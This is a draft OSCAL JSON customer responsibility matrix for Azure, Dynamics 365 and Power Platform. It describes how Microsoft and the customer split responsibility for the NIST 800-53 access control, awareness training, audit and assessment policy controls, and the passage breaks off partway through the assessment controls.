{"system-security-plan":{"uuid":"e1503c26-7b31-42a5-87ba-624e9334106a","metadata":{"roles":[{"id":"system-owner","title":"The System Owner"},{"id":"cloud-service-provider","title":"The Cloud Service Provider","short-name":"CSP"},{"id":"customer","title":"The Customer"}],"title":"Azure + Dynamics 365 + Power Platform Customer Responsibility Matrix","parties":[{"name":"Microsoft","type":"organization","uuid":"bf0672d8-1ac0-484f-a49e-79cc6347bdb7"},{"name":"The Customer","type":"organization","uuid":"d4ac8d4f-fa39-497e-b54b-38c22bdf2429"}],"version":"DRAFT","document-ids":[{"scheme":"http://oscal.io/oscal/identifier/content-uuid","identifier":"0ada35e6-ddf6-41df-bc8e-a630fd5dd483"}],"last-modified":"2026-05-26T16:49:11Z","oscal-version":"1.2.2"},"import-profile":{"href":"#21f7e477-4aea-432c-95e0-65b678ecdc89"},"system-characteristics":{"status":{"state":"other"},"system-ids":[{"id":"8ad7dd1c-6c64-4cf8-a488-6e7a118e1650","identifier-type":"https://ietf.org/rfc/rfc4122"},{"id":"F1603087869","identifier-type":"http://fedramp.gov"}],"description":"","system-name":"Azure","system-information":{"information-types":[{"uuid":"472ff18d-01d5-45cc-9e16-32092c39bea7","title":"None","description":"Placeholder"}]},"authorization-boundary":{"description":""},"security-sensitivity-level":"[not-specified]"},"system-implementation":{"users":[{"uuid":"ecc8e51e-56d1-4961-b4f2-cdcb90f4a9c1","props":[{"name":"type","value":"internal"}],"title":"System Owner","role-ids":["system-owner"]}],"components":[{"type":"this-system","uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","title":"This 
System","status":{"state":"operational"},"description":""}]},"control-implementation":{"description":"","implemented-requirements":[{"uuid":"a2a96655-b335-48f5-b96d-f27f3f17b00d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-1","statements":[{"uuid":"e9387127-bbf3-4231-b621-a942fead0258","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-1_smt.a","by-components":[{"uuid":"969a8e52-3317-493d-9f8b-eda83696d6d4","export":{"provided":[{"uuid":"acfc2a6d-8e2e-46fb-bc7c-a535f18a31e5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-001"}],"description":"Azure addresses the access control policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. 
The policy addresses the following: * Access control * Segregation of duties Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with access control are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Access Control Standard Operating Procedure (SOP) implements the access control policy and associated controls and documents the following procedures: * Provisioning of Access * Modification and Review of Access Rights * Privilege Management * Inactive User Account Review * Separation of Duties * Remote Access Mechanisms * Session Control Parameters Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with access control are documented and stored within internal Azure SharePoint sites. 
Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"8bba1e43-bd13-4a90-abe8-5ff3e01470bb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-001"}],"description":"The customer is responsible for developing, documenting, and disseminating access control policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the access control policy and procedures and the associated access controls.","provided-uuid":"acfc2a6d-8e2e-46fb-bc7c-a535f18a31e5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4c04655a-7575-4b9d-b54d-1c19d7bf830e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-1_smt.b","by-components":[{"uuid":"52748d3a-78a6-41d5-a6b4-7ced56e3ee6f","export":{"provided":[{"uuid":"7e47de7a-8431-4cf0-8293-427690e85bd4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility 
for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. \nOn an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy Governance SOP describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually. \nThe Azure SOP team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure SOP team makes updates after a significant change affecting policy or procedure execution as well. Certain service teams may also establish their own procedures, SOPs, or runbooks. 
If established, service-team-specific procedures are reviewed and updated by their respective teams as needed."}],"responsibilities":[{"uuid":"b356504a-e07b-43a9-a480-16f03b1a6478","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-003"}],"description":"The customer is responsible for reviewing and updating access control policies and procedures in accordance with FedRAMP requirements.","provided-uuid":"7e47de7a-8431-4cf0-8293-427690e85bd4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d7d272d0-4ba2-4356-9f6d-7b6c95984ade","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-1_smt.c","by-components":[{"uuid":"2cd6efed-2cb2-4c17-a771-7cea0b6cfafa","export":{"provided":[{"uuid":"0f0bbde7-cd0e-4373-b3b5-2c643d30108b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. 
The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"dd4d7ac9-569a-44c8-a910-654a158d70c8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-004"}],"description":"The customer is responsible for reviewing and updating the current access control policy on a regular basis and following organization defined events.","provided-uuid":"0f0bbde7-cd0e-4373-b3b5-2c643d30108b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a2062522-36d1-4491-b69c-17e776e0fd73","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"at-1","statements":[{"uuid":"dfd7ab36-7a48-4c36-a422-e8400dfbee41","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-1_smt.a","by-components":[{"uuid":"e6d7daef-4228-4543-836a-fe46a6f2137b","export":{"provided":[{"uuid":"551ec9d1-b76b-4e07-97bd-ef4f8466a9c7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-001"}],"description":"Azure addresses the awareness and training policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have 
a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Security training Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with awareness and training are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. 
\nThe Azure Security Education and Awareness Standard Operating Procedure (SOP) implements the awareness and training policy and associated controls and documents the following procedures: * Development of a program that requires all personnel to take the required training and any additional training based on individual job requirements * Educating personnel about specific procedures and topics related to their job function that support maintaining the confidentiality, integrity, and availability of Azure and its services * Standard approach, tools, and techniques used to implement and sustain the awareness program Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with awareness and training are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"c1f8500d-15fa-489d-97b5-502727ce81d5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-001"}],"description":"The customer is responsible for developing, documenting, and disseminating awareness training policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. 
\nThe customer is responsible for procedures to facilitate the implementation of the awareness and training policy and the associated awareness and training controls.","provided-uuid":"551ec9d1-b76b-4e07-97bd-ef4f8466a9c7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"75e8abec-b5a0-4263-84e7-d7eb773c05a6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-1_smt.b","by-components":[{"uuid":"eec4dd21-1e05-47d9-854f-3eafee21937e","export":{"provided":[{"uuid":"dc114415-0c0c-47d8-a86d-7865273f96f7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security Policy and Assurance (CSPA) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. 
Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"ce6e7948-9527-4092-a6c7-319a1b41eb22","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-003"}],"description":"The customer is responsible for procedures to facilitate the implementation of the awareness and training policy and the associated awareness and training controls.","provided-uuid":"dc114415-0c0c-47d8-a86d-7865273f96f7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"31f67fc7-c66f-4462-b3eb-8a7f909abe25","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-1_smt.c","by-components":[{"uuid":"e5bff266-dee8-46a1-90ca-e27046f8ac5e","export":{"provided":[{"uuid":"6db5bba1-f9a0-47c6-9f9f-59e84f21b814","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. 
The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"1350647f-a375-48a9-b6e4-a3d5358c5a53","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-004"}],"description":"The customer is responsible for reviewing and updating the current awareness and training policy on a regular basis and following organization-defined events.","provided-uuid":"6db5bba1-f9a0-47c6-9f9f-59e84f21b814"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bc7aab10-c845-43ec-b570-21689f736451","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-1","statements":[{"uuid":"0b7b9367-fee7-4c99-905b-ac46299803a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-1_smt.a","by-components":[{"uuid":"206980e5-d49e-4218-bc1e-7821bd7970dd","export":{"provided":[{"uuid":"3804ef48-3d7c-47cd-b064-e5e723e0f789","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-001"}],"description":"Azure addresses the audit and accountability policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a 
responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Security logging, monitoring, and reporting Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with audit and accountability are documented and stored within internal Azure SharePoint sites. 
Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Logging and Monitoring SOP implements the audit and accountability policy and associated controls and documents the following procedures: * Security monitoring * Protection of log information * Log retention * Near-real time alerting Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with audit and accountability are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"78190209-e486-43c9-8f74-c04b0cc8f0f6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-001"}],"description":"The customer is responsible for developing, documenting and disseminating audit and accountability policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. 
\nThe customer is responsible for procedures to facilitate the implementation of the audit and accountability policy and the associated audit and accountability controls.","provided-uuid":"3804ef48-3d7c-47cd-b064-e5e723e0f789"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"172b3e3e-53e0-4753-867d-ac23feef9db3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-1_smt.b","by-components":[{"uuid":"4be83177-8139-43f2-8a48-7420405ab4c7","export":{"provided":[{"uuid":"06df74cf-61a7-43c1-a345-c5ad7af0d2eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-003"}],"description":"The Azure Logging and Monitoring SOP implements the audit and accountability policy and associated controls and documents the following procedures: * Security monitoring * Protection of log information * Log retention * Near-real time alerting Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with audit and accountability are documented and stored within internal Azure SharePoint sites. 
Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"a0f9ce9e-3309-4a55-a8f4-afbee998478a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-003"}],"description":"The customer is responsible for procedures to facilitate the implementation of the audit and accountability policy and the associated audit and accountability controls.","provided-uuid":"06df74cf-61a7-43c1-a345-c5ad7af0d2eb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a1e18a3e-e77f-426c-8391-50821afeed9e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-1_smt.c","by-components":[{"uuid":"7cb1089d-5ab2-4204-a52b-841e314ee008","export":{"provided":[{"uuid":"af727fb4-e833-4609-bd49-a90900fe386a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change. 
"}],"responsibilities":[{"uuid":"2221446b-ed78-4b0d-bdaa-5ec0b6cb4c3e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-004"}],"description":"The customer is responsible for reviewing and updating the current audit and accountability policy on a regular basis and following organization defined events. The customer is responsible for reviewing and updating the current audit and accountability procedures on a regular basis and following organization defined events.","provided-uuid":"af727fb4-e833-4609-bd49-a90900fe386a"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"32f1cc07-95b5-4bb1-a3c8-eb968c855987","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-1","statements":[{"uuid":"b7f64bb4-36a4-4974-b10f-8227fe5101d7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-1_smt.a","by-components":[{"uuid":"5247e45b-3274-4a4d-b192-c8e947c4f9c5","export":{"provided":[{"uuid":"1add00e3-4651-4547-9d51-f25109625a51","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-001"}],"description":"Azure addresses the security assessment and authorization policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. 
The policy addresses the following: * Compliance framework management * Organizational risk assessment * Information security coordination * Information security accountability Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with security assessment and authorization are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Security Assessment and Authorization Standard Operating Procedure (SOP) implements the security assessment and authorization policy and associated controls and documents the following procedures: * Security assessments * Plan of action and milestones * Security authorization * Continuous monitoring Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. 
Service-team-specific policies and procedures associated with security assessment and authorization are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"a7754b60-89df-49aa-b9c8-b414a086a894","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-001"}],"description":"The customer is responsible for developing, documenting, and disseminating assessment, authorization, and monitoring policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the assessment, authorization, and monitoring policy and the associated assessment, authorization, and monitoring controls.","provided-uuid":"1add00e3-4651-4547-9d51-f25109625a51"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6b3448f7-0ab2-4aaf-bc5f-9626c10f7dd5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-1_smt.b","by-components":[{"uuid":"41293576-165b-46b2-9cb2-676011f5b101","export":{"provided":[{"uuid":"c0815e91-ac8c-47a1-8cb8-b4008b21667f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. 
If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"a4f975ef-22fb-401f-a81b-273d0f3fe3b8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the assessment, authorization, and monitoring policy and procedures.","provided-uuid":"c0815e91-ac8c-47a1-8cb8-b4008b21667f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"32242cd4-a397-4e16-b0b0-4b1570fc513a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-1_smt.c","by-components":[{"uuid":"add01ee3-a46a-4e2e-93bd-8801c5dde460","export":{"provided":[{"uuid":"7d03beb6-d073-45c1-a8c0-ab0cd424cb61","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. 
